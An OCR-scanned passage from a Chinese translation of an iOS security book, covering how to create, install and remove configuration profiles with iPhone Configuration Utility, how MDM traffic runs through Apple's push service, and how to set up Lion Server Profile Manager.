配置 描述 文件 ， 但 是 只 有 移动 设备 管理 产品 的 开发 人 员 才 可 能 这 么 做 。 蔷 果 公司 建 议 大 多 数 用 
户 依靠 苹果 的 记 hone 配 置 实 用 工具 或 第 三 方 移动 设备 管理 产品 来 创建 、 管 理 及 部 署 配 置 描 述 文 
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件 。 正 如 接 下 来 所 描述 的 ， 配备 iOS 设 备 数 量 不 多 的 企业 可 以 用 iPhone 配 置 实用 工具 对 这 些 设 备 
进行 配置 。 





2.1.2 iPhone 配置 实用 工具 


苹果 公司 的 iPhone 配 置 实用 工具 是 一 种 可 在 Mac OS X 和 Windows 操 作 系 统 上 使 用 的 图 形 化 
实用 工具 ， 它 可 以 帮助 用 户 在 iOS 设 备 上 创建 、 管 理 和 安装 配置 描述 文件 。 在 编写 本 书 之 时 ， 该 
工具 最 新 的 版 本 是 3.4， 是 为 了 支持 iOS 5 中 的 新 配置 选项 而 更 新 的 。 

在 首次 运行 时 ，iPhone 配 置 实用 工具 会 自动 在 用 户 的 keychain 中 自动 创建 根 CA ( Certificate 
Authority， 证 书 授权 机 构 ) 证 书 。iPhone 配 置 实 用 工具 会 为 那些 通过 USB 端 口 连接 到 运行 它 的 主 
机 上 的 设备 自动 创建 证 书 ， 而 该 CA 证 书 的 用 途 就 是 给 这 些 证 书签 名 。 所 创建 证 书 的 作用 则 是 为 
要 安全 传输 到 这 些 设备 上 的 配置 描述 文件 签名 和 加 密 。 假设 接收 设备 已 经 由 运行 Phone 配 置 实用 
工具 的 主机 授予 了 证 书 ， 那 么 你 就 可 以 通过 不 安全 的 网 络 ( 比如 电子 邮件 或 Web ) 安全 地 发 送 包 
含 用 户 凭证 的 配置 描述 文件 了 。 

1. 创建 配置 描述 文件 

为 展示 如 何 使 用 让 hone 配 置 实 用 工具 , 在 此 我 们 用 该 工具 创建 只 含 密码 策略 有 效 载荷 的 简单 
配置 描述 文件 ， 并 将 其 通过 直接 USB 连 接 安装 到 iOS 设 备 上 。 

首先 ， 我 们 点 击 侧 边栏 中 LIBRARY ( 资料 库 ”) 条 目下 的 Configuration Profiles (配置 描述 
文件 ) 选项 。 如 果 已 经 存在 配置 描述 文件 ， 这 样 就 会 将 这 些 文件 全 部 列 出 来 。 要 创建 新 的 描述 
文件 ， 请 点 击 New (新建 ) 按钮 ， 这 会 调 出 如 图 2-1 所 示 的 配置 面板 ， 让 用 户 对 配置 描述 文件 的 
通用 设置 和 特别 设置 进行 配置 。 大 家 应 该 在 Name ( 名 称 )、Identifier ( 标识 符 )、Organization ( 组 
织 ) 和 Description ( 描述 ) 字段 中 填 入 相应 信息 ， 从 而 确定 要 为 哪些 用 户 的 设备 安装 该 配置 描述 
文件 。 

该 面板 中 的 另 一 项 重要 设置 是 Security ( 安全 性 ) 设置 ， 它 定义 了 该 描述 文件 能 否 被 移 除 。 
有 3 种 设置 选择 ， 分 别 是 Always ( 总 是 )、Authorization ( 鉴定 ) 和 Never ( 永 不 )。 如 果 将 其 设置 
为 Authorization， 那 么 只 有 用 户 输入 配置 过 的 “鉴定 密码 ”之 后 该 配置 描述 文件 才 可 被 移 除 。 而 
如 果 把 该 选项 设置 为 Never, 用 户 就 可 能 无 法 从 其 设备 上 移 除 该 配置 描述 文件 。 从 iOS 用 户 界面 移 
除 配 置 描述 文件 的 唯一 方式 是 : 打开 iOS 中 的 Settings ( 设置 ) 应 用 , 选择 General ( 通用 ) 子 菜单 ， 
然后 点 击 Reset (还原 ) 子 菜单 ， 并 选择 Erase All Content( 抹 掉 所 有 内 容 和 设置 ) 按钮 ， 从 而 将 
设备 恢复 到 出 三 状 态 。 它 执行 的 操作 非常 类 似 于 用 户 通 过 iCloud 的 “查找 我 的 Phone” 发 送 , 或 
是 企业 管理 员 通 过 动态 同步 ( ActiveSync ) 或 移动 设备 管理 发 送 的 远程 擦 除 命 令 。 记 住 ， 那 些 知 
识 丰 富 的 用 户 还 可 以 为 设备 越狱 , 并 从 底层 文件 系统 直接 删除 配置 描述 文件 ,从 而 强制 移 除 该 文 
件 。 欲 详细 了 解 与 文件 系统 中 配置 描述 文件 有 关 的 内 容 ， 请 参考 David Schuetz 的 2011 黑 帽 大 会 白 
皮 书 “The iOS MDM Protocol”。” 







































































































































































































































































Qz 此 处 的 中 文 译名 基于 记 hone 配 置 实用 工具 3.6.1 中 文 版 。 一 一 译 者 注 
@) 详 见 http:/media.blackhat.com/bh-us-11/Schuetz/BH US _11 _Schuetz InsideAppleMDM_WPpdf。 一 一 译 者 注 
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图 2-1 创建 配置 描述 文件 


现在 ， 我 们 就 可 以 为 该 描述 文件 创建 配置 有 效 载荷 了 。 请 点 击 Configuration Profile ( 配置 描 
述 文件 ) 面板 左 侧 的 Passcode ( 密码 ) 选项 。 这 样 ， 你 就 可 以 在 右 侧面 板 中 打开 可 用 的 密码 设置 ， 
并 设置 员工 必须 设 定 的 、 与 所 要 访问 数据 的 保密 程度 相当 的 密码 。 图 2-2 中 的 例子 展示 了 为 可 能 
用 于 存储 或 访问 企业 敏感 数据 的 OS 设备 推荐 的 设置 。 

利用 也 hone 配 置 实用 工具 向 设备 分 发 配置 描述 文件 的 方式 有 多 种 ， 用 户 可 以 通过 USB 连 接 安 
装配 置 描 述 文件 、 以 附件 形式 用 电子 邮件 将 其 发 送 给 用 户 , 或 是 将 描述 文件 导出 为 可 存放 在 Web 
服务 器 上 的 .mobileconfig 文 件 。 这 里 我 们 用 的 是 最 简单 的 描述 文件 安装 方法 : 先 用 USB 数 据 线 把 
iOS 设 备 直 接连 接 到 Mac 机 上 ， 然 后 安装 新 的 配置 描述 文件 。 

2. 安装 配置 描述 文件 

在 用 USB 连 接线 将 iOS 设 备 连接 到 Mac 机 之 后 ， 它 会 出 现在 iPhone 配 置 实 用 工具 侧 边 栏 中 的 
Devices (设备 ) 条 目下 ， 如 图 2-3 所 示 。 点 击 Configuration Profile ( 配置 描述 文件 ) 选项 卡 ， 这 时 
就 可 看 到 该 设备 上 已 经 安装 的 描述 文件 ,以 及 iPhone 配置 实用 工具 创建 但 尚未 安装 到 该 设备 上 的 
配置 描述 文件 。 在 尚未 安装 的 配置 描述 文件 右 侧 有 一 个 Install ( 安装 ) 按钮 。 点 击 刚 创建 的 那个 
配置 描述 文件 右 侧 的 “安装 ”按钮 ,就 会 把 它 安 装 到 连接 的 iOS 设 备 上 。 这 样 该 iOS 设 备 上 会 出 现 
如 图 2-4 所 示 的 配置 描述 文件 安装 确认 界面 。 
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图 2-2 ”配置 “密码 ”有 效 载 答 





图 2-3 ”通过 USB 连 接 安装 配置 描述 文件 





图 2-4 所 示 的 确认 界面 展示 了 配置 描述 文件 中 的 基本 信息 , 列 出 了 其 中 包含 的 配置 有 效 载荷 。 
该 描述 文件 上 带 有 绿色 的 Verified (已 验证 ) 标志 ,这 是 因为 iPhone 配 置 实用 工具 会 自动 为 自己 创 
建 自 签名 的 X.509 根 CA 证 书 ， 它 会 使 用 该 根 CA 证 书 为 通过 USB 连 接 的 各 设备 创建 签名 证 书 。 这 
些 对 应 各 设备 的 证 书 会 被 iPhone 配 置 实用 工具 用 于 为 发 送 给 相应 设备 的 配置 描述 文件 签名 和 加 
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密 。 由 于 设备 上 已 经 自动 安装 了 该 证 书 ， 因 此 设备 可 以 验证 通过 USB 连 接 、 电 子 邮件 或 Web 发 送 
而 来 的 配置 描述 文件 的 真实 性 。 





iOS Hackers 
iOS Hackers Inc. 


| ovrited WE 





Description Profile description. a 
Signed iPhone Configuration Utility 


(6506EBB9-3A1A-42A2-B3ED- 
8CDA5213EEB2) 


Received Oct 23, 2011 


Contains Password Policy 





More Details 








图 2-4 配置 描述 文件 安装 确认 界面 


如 果 你 触 击 More Details〈 更 多 详细 信息 ) 选项 ， 就 会 看 到 如 图 2-5 所 示 的 界面 。 用 户 可 以 通 ”一 
过 该 界面 查看 用 来 为 配置 描述 文件 签名 的 证 书 , 并 列 出 与 该 文件 中 包含 的 配置 有 效 载荷 有 关 的 更 
多 详情 。 


Install Profile NiOS Hackers 


这 hone Configuration... 
由 Issued by: iPhone Configuratio... > 
A Expires: December 29, 2012 


区 到 Passcode 
Moe Enter a strong passcode with 6or st 
la more letters/numbers including... 








图 2-5 配置 描述 文件 详情 界面 一 
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回 到 之 前 的 界面 ， 要 将 配置 描述 文件 安装 到 iOS 设 备 上 ， 请 触 击 “安装 ”按钮 ， 接 着 你 会 看 
到 如 图 2-6 所 示 的 确认 对 话 框 。 


| @ Verified I 


Install Profile 


Installing this profile will change 


settings on your iPod. 


07-111 | Install Now 


A 





图 2-6 配置 描述 文件 安装 确认 


如 果 设 备 尚 未 被 设置 密码 , 或 已 存在 的 密码 不 满足 配置 描述 文件 中 的 复杂 度 要 求 , 安装 该 配 
置 描述 文件 就 会 强制 用 户 立即 设置 新 密码 ， 如 图 2-7 所 示 。 注 意 ， 描 述 密码 强度 要 求 的 指示 与 配 
置 描述 文件 中 的 设置 是 相 呼应 的 。 


iPod 会 4:10 PM 









Cancel 


Set Passcode 


Enter a passcode 


( 


Enter a strong passcode with 6 or more 
letters/numbers including one special character 
(#8). 


olwlelel™viv|'lolP 
Alslolrleln ls lk 

司 上 日 四 日 加 日 四 加 后 
图 2-7 ”立即 提示 创建 新 密码 
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在 设置 了 密码 之 后 ， 应 该 会 看 到 如 图 2-8 所 示 的 界面 ， 确 定 该 描述 文件 已 成 功 安 装 。 配 置 描 
述 文件 中 指定 的 设置 现在 也 应 该 生效 了 。 要 验证 这 一 点 ， 可 以 在 “设置 ”应 用 的 General (通用 ) 
菜单 中 进入 Passcode Lock ( 密码 锁定 ) 选项 界面 ， 如 图 2-9 所 示 。 正 如 大 家 所 看 到 的 ， 某 些 选项 





已 被 描述 文件 禁用 并 处 于 变 灰 的 状态 。 国 本 
iPod 会 4:10 PM BS iPod 全 4:11 PM [3 








Profile Installed Done General Passcode Lock 


四 iOS Hackers Turn Passcode Off 
到 | iOS Hackers Inc. 








Change Passcode 
| @ Verified 











Description Profile description. 


Signed iPhone Configuration Utility 
(6506EBB9-3A1A-42A2-B3ED- 
8CDA5213EEB2) Simple Passcode OFF ) 


4 
Received Oct 23, 2011 


Require Passcode Immediately > 





Gopine Passwordponey A simple passcode is a 4 digit number. 











More Details > Erase Data EC ) 














Erase all data on this iPod 
after 5 failed passcode attempts. 


Data protection is enabled. 














图 2-8 ”确认 配置 描述 文件 已 安装 图 2-9 展示 该 配置 描述 文件 作用 的 密码 锁定 界面 





3. 更 新 描述 文件 

iPhone 配 置 实 用 工具 会 为 连接 到 运行 该 工具 的 Mac 机 上 的 每 一 台 iOS 设 备 自动 创建 和 安装 证 
书 。 因 为 在 运行 Phone 配 置 实用 工具 的 计算 机 与 移动 设备 之 间 已 经 存在 安全 信任 关系 ， 所 以 这 样 
就 使 配置 描述 文件 可 以 安全 地 更 新 。 如 果 要 安装 的 配置 描述 文件 与 已 安装 的 配置 描述 文件 有 着 相 
同 的 标识 符 , 而 且 为 新 描述 文件 签名 与 为 现 有 描述 文件 签名 所 使 用 的 证 书 都 相同 ， 它 就 会 替换 现 
有 的 配置 描述 文件 。 

运行 iPhone 配 置 实用 工具 的 计算 机 与 通过 USB 数 据 线 连接 到 该 计算 机 的 iOS 设 备 之 间 存 在 基 
于 证 书 的 安全 配对 , 这 种 配对 让 用 户 可 以 直接 通过 USB 连 接 安 装 初始 的 配置 描述 文件 ,并 通过 电 
子 邮 件 或 Web 安 全 地 发 送 更 新 过 的 已 加 密 且 已 签名 的 配置 描述 文件 。 只 要 通过 培训 让 用 户 确 保 发 
送 的 描述 文件 在 安装 界面 上 都 具有 绿色 的 “已 验证 ”标记 ,更 新 描述 文件 就 会 既 安 全 又 省 时 。 

4. 移 除 描述 文件 

打开 iOS 中 的 “设置 ”应 用 ,选择 “通用 ” 子 菜单 ， 再 选择 “描述 文件 ” 子 菜单 ， 就 可 以 从 
中 移 除 配置 描述 文件 了 。 通常 情况 下 , 该 界面 如 图 2-10 所 示 。 大 家 可 以 触 击 Remove ( 移 走 ) 按钮 
移 除 描述 文件 。 
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iPod 会 9:16 PM EB 
General Profile 





iOS Hackers 
iOS Hackers Inc. 


overred EET 


Description Profile description. 


Signed iPhone Configuration Utility 
(6506EBB9-3A1A-42A2-B3ED- 
8CDA5213EEB2) 


Received Oct 23, 2011 





Contains Profile Removal Password 
Password Policy 








More Details > 





图 2-10 ”描述 文件 详情 界面 


不 过 请 记 住 , 这 些 配置 描述 文件 也 可 以 配置 成 只 有 在 输入 鉴定 密码 的 情况 下 才 可 被 移 除 或 是 
完全 不 可 被 移 除 。 如 果 为 描述 文件 配置 了 移 除 密码 ， 用 户 就 要 输入 该 移 除 密码 ， 如 图 2-11 所 示 。 
而 如 果 描 述 文件 不 可 被 移 除 ， 那 么 用 户 在 “描述 文件 ”详细 信息 界面 中 就 根本 不 会 看 到 “ 移 走 ” 
按钮 吕 








| “ Remove Protected Profile 


| | 


Removing this profile will change 
由 settings on your iPod. 


esTTs | Remove 


alwlslalrjyluloln 
Alsjplrjslnljkl 
本 zj xlclvlelNwis 
.7123 | space | return 


图 2-11 移 除 受 保护 的 描述 文件 
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5. 应 用 和 配置 概要 文件 

iPhone 配置 实用 工具 还 可 用 来 在 iOS 设 备 上 安装 应 用 和 配置 概要 文件 (provisioning profile )。 
大 家 现在 要 知道 的 是 , 要 在 iOS 设 备 上 运行 定制 的 应 用 , 就 需要 苹果 公司 为 该 应 用 的 开发 者 签发 
的 配置 概要 文件 。 这 些 配置 概要 文件 可 以 是 需要 单独 安装 的 ， 也 可 以 是 与 应 用 捆绑 在 一 起 分 
发 的 。 


2.2 ”移动 设备 管理 
iPhone 配 置 实用 工具 可 用 于 对 iOS 设 备 进行 基本 的 企业 级 管理 ， 不 过 它 显然 不 适用 于 管理 大 














量 设备 。 对 于 需要 管理 更 多 设备 的 企业 来 说 , 苹果 公司 已 经 在 iOS 中 实现 了 MDM (移动 设备 管理 ) 








功能 ， 使 这 些 企业 完全 可 以 远程 管理 这 些 设备 。 

苇 果 公 司 向 第 三 方 供应 商 发 布 了 他 们 的 MDM API， 而 市 面 上 存在 着 大 量 第 三 方 移动 设备 管 
理 产 品 商 。 苹 果 公 司 也 在 Lion Server 中 提供 了 自己 的 MDM 解 决 方案 Profile Manager ( 描述 文件 管 
理 器 ), 该 服务 除了 可 以 为 用 户 管理 iOS 设 备 的 设置 ,还 可 以 管理 运行 Mac OS X 的 计算 机 的 设置 。 
Profiler Manager 是 适用 于 小 型 组 织 或 工作 组 的 简单 MDM 解 决 方案 。 如 果 要 管理 大 量 设备 或 需要 
更 多 功能 ， 我 们 应 该 选择 一 种 支持 iOS 设 备 的 商业 MDM 解 决 方案 。 



































2.2.1 MDM 网 络 通 信 


在 苹果 公司 的 MDM 体 系 结构 中 ( 如 图 2-12 所 示 )， 网 络 通信 是 在 用 户 的 iOS 设 备 、 用 户 所 
在 组 织 的 MDM 服 务 器 和 APNS ( Apple's Push Notification Service， 苹 果 推 送 通 知 服务 ) 这 三 个 
实体 间 进 行 的 。MDM 服 务 器 会 与 APNS 通 信 ， 发 布 到 指定 设备 的 推送 通知 ， 再 通过 该 设备 与 
APNS 的 持久 连 村 接 完 成 推送 。iOS 设 备 在 接收 到 推送 通知 时 就 会 与 配置 过 的 MDM 服 务 器 直接 建 



































立 连 接 。 





XMPP-TLS (TCP 5223) 
APNS (TCP 2195-2196) 


ER 
ES HTTP/HTTPS, A 
Lion 服务 器 SCEP (TCP 1640) 


iOS 设备 
图 2-12 ”MDM 网 络 通信 
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iOS 设 备 本 身 与 位 于 courier.push.apple.com 的 某 一 APNS 信 使 服务 器 保持 着 持久 连接 ， 其 中 
APNS 信 使 服务 器 是 所 有 iOS 推 送 通知 都 要 使 用 的 集中 通信 通道 .这 一 到 TCP 5223 端 口 的 连接 是 利 
用 客户 端 证 书 验 证 身份 的 了 LS 建立 的 ， 而 且 使 用 的 是 XMPP 协 议 。 带 有 蜂 窜 数 据 连接 的 让 hone 和 
iPad 可 以 通过 蜂窝 网 络 建立 该 连接 ， 而 其 他 移动 ?OS 设备 只 有 在 连接 到 Wi-Fi 网 络 时 才能 建立 该 连 
接 。XMPP 协 议 是 为 Jabber 即 时 消息 系统 设计 的 ， 不 过 该 协议 相当 灵活 ， 适 用 于 任何 需要 在 线 状 
态 通 知 以 及 使 用 “发 布 /订阅 ”消息 分 发 模型 的 系统 。iOS 设 备 会 通知 苹果 的 APNS 服 务 器 要 订阅 
哪些 主题 ， 这 些 APNS 服 务 器 会 把 发 布 到 这 些 主题 下 的 消息 路 由 到 订阅 设备 。 而 对 于 MDM 来 说 ， 
受 管理 的 客户 端 设备 会 被 配置 成 订阅 与 管理 该 设备 的 MDM 对 应 的 唯一 主题 。 

就 像 推 送 通知 提供 商 那样 , MDM 服 务 器 的 行为 类 似 于 第 三 方 应 用 开发 者 为 他 们 的 iOS 应 用 实 
现 推送 通知 的 方式 。 在 这 种 情况 下 ，MDM 服 务 器 会 连接 到 位 于 gateway.push.apple.com 的 苹果 公 
司 APNS 网 关 服 务 器 。 该 连接 也 基于 利用 客户 端 证 书 进行 身份 验证 的 TLS, 只 不 过 它 是 连接 到 ICP 
2195 端 口 的 。 推 送 通知 是 JSON 格 式 的 ， 并 且 会 通过 定制 的 二 进 制 网 络 协议 发 送 到 苹果 公司 的 
APNS 服 务 器 。 推 送 通知 提供 商 也 会 在 TCP 2196 端 口上 建立 通 向 苹果 公司 APNS 服 务 器 的 类 似 连 
接 ,， 不 过 这 是 用 于 反馈 服务 的 。 苹 果 公 司 并 不 保证 这 些 服务 都 保持 在 一 个 既定 的 了 下子 网 中 ， 所 以 
它 建议 防火 墙 管理 员 放 开 到 苹果 公司 拥有 的 整个 17.0.0.0/8 空 间 的 出 站 访问 。 要 了 解 更 多 与 这 些 通 
信 有 关 的 具体 信息 ， 请 在 iOS Developer Library 中 参考 苹果 公司 的 “Local and Push Notification 
Programming Guide”( 本 地 和 推送 通知 编程 指南 )。 

最 后 ,MDM 服 务 器 会 通过 HTTPS 提 供 MDM API。 当 iOS 设 备 接收 到 MDM 推 送 通知 时 ， 它 就 
会 联系 与 注册 设备 时 配置 的 URL 对 应 的 MDM 服 务 器 ， 并 直接 向 该 MDM 服 务 器 查询 所 发 送 的 命 
令 。 针 对 这 一 命令 的 响应 会 通过 HTTPS 发 送 回 这 台 MDM 服 务 器 。MDM 服 务 器 可 能 会 在 TCP 1640 
端口 上 提供 基于 HTTP 的 SCEP ( Simple Certificate Enrollment Protocol， 简 单 证 书 注册 协议 ) 服务 
器 。 不 过 ，MDM API 的 协议 层 细节 不 在 本 章 介 绍 范围 之 内 。 要 了 解 更 多 与 之 相关 的 信息 ， 请 参 
考 David Schuetz 在 2011 年 黑 帽 大 会 上 所 作 的 演说 “Inside Apple’*s MDM Black Box”"。 












































































































































































































































2.2.2 Lion Server 描述 文件 管理 器 


Lion_Server 的 描述 文件 管理 器 是 一 种 可 作为 MDM _ API 服务器 和 管理 控制 台 使 用 的 
Ruby-on-Rails Web 应 用 。 初 始 的 安装 和 配置 工作 都 是 通过 Lion Server 应 用 进行 的 ， 不 过 在 完成 安 
装 之 后 ， 大 多 数 管理 任务 都 是 在 用 Web 浏 览 器 连接 到 Web 应 用 描述 文件 管理 器 ( Profile Manager ) 
后 进行 的 。 

描述 文件 管理 器 可 以 为 用 户 、 用 户 群 组 、 设备 或 设备 群 组 应 用 设置 。 若 设备 所 有 者 拥有 Open 
Directory ( OD ) 账户 , 那么 他 们 可 以 直接 登录 到 描述 文件 管理 器 Web 应 用 ,注册 并 管理 他 们 的 设 
备 。 如 果 设 备 是 多 人 共用 的 ， 或 者 用 户 没有 OD 账户 ，Lion Server 管 理 员 就 必须 亲自 为 用 户 注 册 
设备 。 描 述 文 件 管理 器 支持 名 为 注册 描述 文件 (Enrollment Profile ) 的 特殊 描述 文件 ， 在 不 需要 
用 户 登 录 描 述 文件 管理 器 Web 应 用 的 情况 下 ， 可 以 协助 注册 需要 远程 管理 的 设备 。 本 章 假设 设备 




































































GD 参见 https://media.blackhat.com/bh-us-11/Schuetz/BH_US_11_Schuetz_InsideAppleMDM_ WP.pdf,。 一 一 译 者 注 
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所 有 者 也 拥有 Lion Server 上 的 Open Directory 账 户 。 要 详细 了 解 注 册 描 述 文件 的 使 用 ,请 参考 Arek 
Dreyer 所 车 的 电子 书 Managing iOS Devices with OS X Lion Server ( Peachpit Press )。 

1. 安装 描述 文件 管理 器 

要 安装 描述 文件 管理 器 ， 请 运行 Server 应 用 程序 ， 并 点 击 侧 边栏 中 的 描述 文件 管理 器 。 这 样 
你 将 打开 描述 文件 管理 器 的 “设置 ”面板 ， 如 图 2-13 所 示 。 在 启用 这 一 服务 之 前 ， 大 家 必须 进行 
一 些 基 本 的 配置 。 首 先 ， 请 点 击 Configure (配置 ) 按钮 。 
































图 2-13 ”在 Server 应 用 程序 中 配置 描述 文件 管理 器 服务 














如 果 没 有 把 Lion Server 配 置 成 Open Directory ( OD ) master， 系 统 会 引导 你 完成 这 一 过 程 。 
Open Directory master 是 描述 文件 管理 器 用 来 为 每 个 OD 用 户 和 OD 组 存储 设备 设置 的 安装 过 程 会 
提示 用 户 为 OD LDAP 服 务 器 进行 一 些 基 本 设置 ,然后 配置 和 启用 该 服务 ， 如 图 2-14 所 示 。 

描述 文件 管理 器 Web 应 用 只 能 通过 SSL 使 用 。 确 保 与 Web 应 用 间 的 通信 安全 是 很 重要 的 ， 
为 它 既 要 用 于 设备 间 通 信 , 也 要 用 于 描述 文件 管理 ,安装 过 程 中 , 用 户 需 要 为 该 Web 服 务 选用 SSL 
证 书 。 理 想 状 态 下 ， 大 家 应 该 使 用 由 受信 任 的 CA 或 是 组 织 的 内 部 CA 签发 的 完全 合乎 规范 的 SSL 
Web 服 务 器 证 书 。 如果 组 织 规模 较 小 ,或 者 你 只 是 在 做 测试 ,也 可 以 使 用 创建 Open Directory master 
时 为 服务 器 自动 创建 的 证 书 。 如 图 2-15 所 示 ， 该 证 书 的 签发 者 处 是 用 户 的 服务 器 主机 名 ,并 且 是 
由 用 户 服务 器 的 Open Directory Intermediate CA 签名 的 。 
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图 2-15 ”为 描述 文件 管理 器 Web 应 用 











图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 





图 2-14 ”创建 Open Directory master 


选择 SSL 证 书 
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若 想 与 APNS ( 荚果 推送 通知 服务 ) 通信 ， 描 述 文件 管理 器 需要 客户 端 证 书 来 向 苹果 公司 的 
服务 器 验证 自己 的 身份 。 如 果 没 有 将 服务 器 配置 成 启用 APNS ， 安 装 过 程 会 从 苹果 公司 的 服务 器 
请 求 免 费 的 APNS 证 书 。 只 要 拥有 Apple ID ， 我 们 就 可 在 Lion Server 上 获得 APNS 证 书 。 用 户 不 再 
像 Lion Server 发 布 之 前 那样 需要 注册 iDEP (iOS Developer Enterprise Program，iOS 开 发 者 企业 计 
划 ) 了 。 应 该 创建 和 使 用 组 织 的 Apple ID ， 而 不 是 使 用 与 个 人 相关 的 Apple ID 。 只 有 在 测试 时 才 
能 使 用 个 人 的 Apple ID ， 工 作 环 境 中 可 不 能 这 么 做 。 

如 图 2-16 所 示 ， 我 们 输入 自己 组 织 的 Apple ID， 自 动 创 建 和 下 载 APNS 证 书 。 

















图 2-16 ”请 求 APNS 证 书 


如 果 成 功 完成 了 上 述 配 置 步骤 ,我 们 会 看 到 如 图 2-17 所 示 的 界面 , 确认 服务 器 满足 运行 描述 
文件 管理 需 的 所 有 需求 。 点 击 “ 完 成 ”按钮 之 后 ， 就 会 返回 描述 文件 管理 需 的 主 配置 面板 。 

如 果 需 要 更 高 的 安全 性 ， 还 应 该 启用 配置 描述 文件 签名 。 为 此 ， 只 需 选 中 Sign Configuration 
Profiles (签名 配置 描述 文件 ) 复 选 框 ， 如 图 2-18 所 示 。 接 下 来 ， 需 要 选择 一 份 代码 签名 证 书 来 为 
描述 文件 签名 。 如 果 你 已 经 为 自己 的 组 织 取得 了 代码 签名 证 书 〈 可 能 是 由 苹果 公司 的 iOS 开 发 者 
计划 签发 的 ), 这 里 正好 能 派 上 用 场 ,。 否则, 你 需要 使 用 由 服务 器 的 Open Directory Intermediate CA 
签发 的 证 书 。 用 由 受信 任 的 认证 机 构 签发 的 证 书 为 配置 描述 文件 签名 后 , 就 可 以 帮助 用 户 验证 他 
们 将 要 安装 的 描述 文件 是 否 可 靠 了 。 

现在 描述 文件 管理 器 应 该 已 经 配置 好 并 可 供 运 行 了 (〈 见 图 2-19 )。 要 启用 该 服务 ， 只 需要 将 
右上 角 的 开关 移 到 “ON” 的 位 置 。 描 述 文件 管理 器 服务 现在 应 该 已 经 在 运行 了 ， 可 以 通过 描述 
文件 管理 器 Web 应 用 来 创建 配置 描述 文件 了 。 要 使 用 描述 文件 管理 器 Web 应 用 ， 点 击 描述 文件 管 
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理 器 配置 面板 底部 的 Open Profile Manager ( 打开 描述 文件 管理 器 ) 按钮 。 


图 2-17 完成 描述 文件 管理 器 的 配置 





图 2-18 ”选择 一 份 代码 签名 证 书 为 配置 描述 文件 签名 
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图 2-19 配置 并 启用 描述 文件 管理 器 
2. 创建 设置 
描述 文件 管理 器 的 登录 页 面 如 图 2-20 所 示 。 大 家 应 该 使 用 自己 的 Lion Server 管 理 员 账号 登录 。 


图 2-20 ”描述 文件 管理 器 登录 页 面 
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在 以 管理 员 身 份 登录 之 后 ， 你 会 看 到 描述 文件 管理 咒 的 主导 航 界 面 ， 如 图 2-21 所 示 。 描 述 文 
管理 器 的 侧 边栏 中 有 Library 和 Activity 这 两 个 栏目 。 如 果 你 创建 了 注册 描述 文件 〈 稍 后 讨论 )， 
在 侧 边栏 中 就 会 出 现 Enrollment Profile 栏 目 。 中 间 的 导航 面板 可 以 让 使 用 者 选择 一 个 特定 的 实体 ， 
而 右 侧 的 “配置 ”面板 则 可 以 让 使 用 者 为 选 定 的 实体 管理 配置 描述 文件 。 正如 大 家 所 见 , 我 们 可 
以 为 每 个 设备 、 设 备 群 组 、 用 户 或 用 户 群 组 创建 和 管理 设备 设置 。 





证 

















图 2-21 ”描述 文件 管理 器 导航 


Server 应 用 程序 中 的 描述 文件 管理 器 配置 面板 可 以 让 使 用 者 选择 为 新 注册 的 用 户 和 设备 发 送 
默认 的 配置 描述 文件 。 默 认 情 况 下 ， 这 是 Everyone 描 述 文件 的 设置 。 要 访问 该 描述 文件 ， 请 在 侧 
边栏 中 点 击 Groups 并 选择 Everyone 群 组 。 如 果 你 点 击 配置 面板 中 的 Edit 按 钮 ， 就 可 以 编辑 相应 的 
配置 描述 文件 。 

在 描述 文件 管理 右 中 编辑 配置 描述 文件 时 , 可 以 看 到 类 似 图 2-22 的 界面 , 很 像 Phone 配 置 实 
用 工具 的 界面 。 这 没什么 好 奇怪 的 ， 因 为 二 者 都 是 用 来 创建 配置 描述 文件 的 。 不 过 ， 描 述 文件 
管理 需 有 一 个 明显 的 不 同 ， 它 将 配置 描述 文件 有 将 载荷 分 成 了 三 类 ， 即 Mac OS X 和 iOS、iOS， 
以 及 Mac OS X， 因 为 描述 文件 管理 器 还 可 以 用 来 为 运行 Mac OS X Lion 的 台式 机 与 笔记 本 管理 
设置 。 

与 使 用 iPhone 配 置 应 用 工具 创建 配置 描述 文件 的 过 程 相同 , 我 们 应 该 为 描述 文件 输入 描述 信 
息 ， 并 对 该 配置 描述 文件 何 时 ( 以 及 是 否 ) 可 被 移 除 进行 配置 。 

在 左 侧面 板 中 选择 Passcode。 如 果 尚 未 创建 Passcode 有 效 载荷 ,你 会 看 到 如 图 2-23 所 示 的 界面 。 
要 创建 该 配置 有 效 载荷 ， 请 点 击 Configuration ( 配置 ) 按钮 。 

图 2-24 所 示 的 密码 设置 与 iPhone 配置 实用 工具 中 的 密码 设置 是 相同 的 〈 人 参见 图 2-2 )。 因 为 这 
两 种 应 用 程序 都 用 于 创建 相同 格式 的 配置 描述 文件 。 
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图 2-22 ”Everyone 配 置 描述 文件 的 设置 





图 2-23 ”创建 Passcode 配 置 有 效 载 荷 


要 完成 配置 ， 请 点 击 OK 按 钮 ， 然 后 点 击 Configuration 面 板 中 的 Save 按 钮 保存 所 做 的 修改 。 
如 果 已 经 在 某 些 设备 上 安装 过 这 个 描述 文件 ， 那 么 保存 修改 会 将 更 新 过 的 描述 文件 推送 给 那些 
设备 。 
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图 2-24 ”对 密码 的 要 求 进行 配置 
3. 注册 设备 
现在 大 家 已 经 用 描述 文件 管理 大 创建 了 配置 描述 文件 , 接着 就 需要 注册 应 用 该 描述 文件 的 设 
备 了 。 首 先 ， 我们 要 确保 自己 的 OS 设备 可 以 连接 到 运行 描述 文件 管理 器 的 服务 器 。 
如 图 2-25 所 示 ， 大 家 要 在 MobileSafari 的 地 址 栏 中 输入 描述 文件 管理 器 My Devices 页 面 的 
URL。 对 于 简单 的 配置 而 言 ， 这 一 页 面 位 于 https://<server>/mydevices。 而 在 生产 部 署 中 ， 大 家 可 
以 通过 电子 邮件 或 短信 将 指向 描述 文件 管理 器 的 URL 发 送 给 用 户 。 


10:17 PM =” 





























Alslolrleln[y lk[t 
zlxIclvlelvIm 
.| /| 


图 2-25 ”在 Mobile Safari 中 连接 到 描述 文件 管理 器 服务 器 
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在 描述 文件 管理 器 的 登录 页 面 ( 如 图 2-26 所 示 )， 我 们 应 该 使 用 Open Directory 中 已 经 存在 的 
用 户 账户 登录 。 


simba.local/auth?redirec © 





simba.local 


Please Log In 





[User Name | 








| Password | 
Gremmeme 
本 = 











图 2-26 ”描述 文件 管理 器 登录 页 面 
在 登录 之 后 ， 你 就 能 看 到 My Devices 页 面 ， 如 图 2-27 所 示 。 如 果 所 使 用 的 设备 还 未 在 描述 文 
